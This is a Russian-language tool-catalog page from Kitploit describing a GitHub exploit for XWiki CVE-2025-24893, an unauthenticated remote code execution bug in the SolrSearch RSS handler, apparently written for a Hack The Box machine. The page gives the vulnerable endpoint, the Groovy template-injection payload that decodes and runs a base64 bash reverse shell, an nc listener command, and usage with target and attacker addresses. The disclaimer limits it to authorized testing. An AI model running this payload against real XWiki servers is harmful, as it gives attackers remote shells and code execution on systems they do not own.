Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
xwiki-cve-2025-24893-exploit — Эксплойт неаутентифицированного RCE для XWiki CVE-2025-24893 через внедрение Groovy-скриптов | Kitploit
Инструменты/GitHubGitHub/tomkingori/xwiki-cve-2025-24893-exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubtomkingori/xwiki-cve-2025-24893-exploit

xwiki-cve-2025-24893-exploit

Эксплойт неаутентифицированного RCE для XWiki CVE-2025-24893 через внедрение Groovy-скриптов

Репозиторий
8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

XWiki CVE-2025-24893 Эксплойт

Эксплойт для неаутентифицированного удаленного выполнения кода на версиях XWiki, уязвимых к CVE-2025-24893.

Обзор уязвимости

Версии XWiki до 15.10.9 уязвимы к неаутентифицированному RCE через внедрение Groovy-скриптов в обработчик RSS-лент SolrSearch. Уязвимость возникает из-за того, что XWiki не выполняет должную санитацию пользовательского ввода в параметре text, позволяя злоумышленникам выйти из контекста RSS и внедрить произвольный Groovy-код.

CVE ID: CVE-2025-24893
Оценка CVSS: 9.8 (Критический)
Затронутые версии: XWiki < 15.10.9

Возможности

  • Простой интерфейс командной строки
  • Автоматическая генерация и кодирование полезной нагрузки
  • Reverse shell с кодированием Base64 для обхода базовых фильтров
  • Минимальные зависимости (только библиотека requests)

Требования

root@kitploit:~
pip3 install requests

Использование

root@kitploit:~
python3 exploit.py <target_url> <attacker_ip> <listener_port>

Пример:

root@kitploit:~
# Start listener on attacker machine
nc -lvnp 9001

# Run exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001

Как это работает

  1. Формирует команду bash reverse shell
  2. Кодирует полезную нагрузку в Base64
  3. Оборачивает её в Groovy-код с помощью инъекции шаблонов (}}}}}}{{{{groovy}}}})
  4. Кодирует полезную нагрузку в URL, сохраняя необходимые разделители
  5. Отправляет GET-запрос на /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>
  6. XWiki обрабатывает вредоносную RSS-ленту и выполняет Groovy-код

Подтверждение концепции

Эксплойт нацелен на следующий endpoint:

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

Уязвимость позволяет выйти из контекста RSS-ленты:

root@kitploit:~
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этой программой. Используйте этот эксплойт только против систем, которыми вы владеете или на тестирование которых имеете явное разрешение.

Ссылки

  • Рекомендации по безопасности XWiki
  • CVE-2025-24893

Лицензия

Лицензия MIT — Подробности в файле LICENSE

Автор

Создано для HTB box "Editor"


Примечание: Всегда убедитесь, что у вас есть соответствующее разрешение перед тестированием любых систем.

Скачать инструмент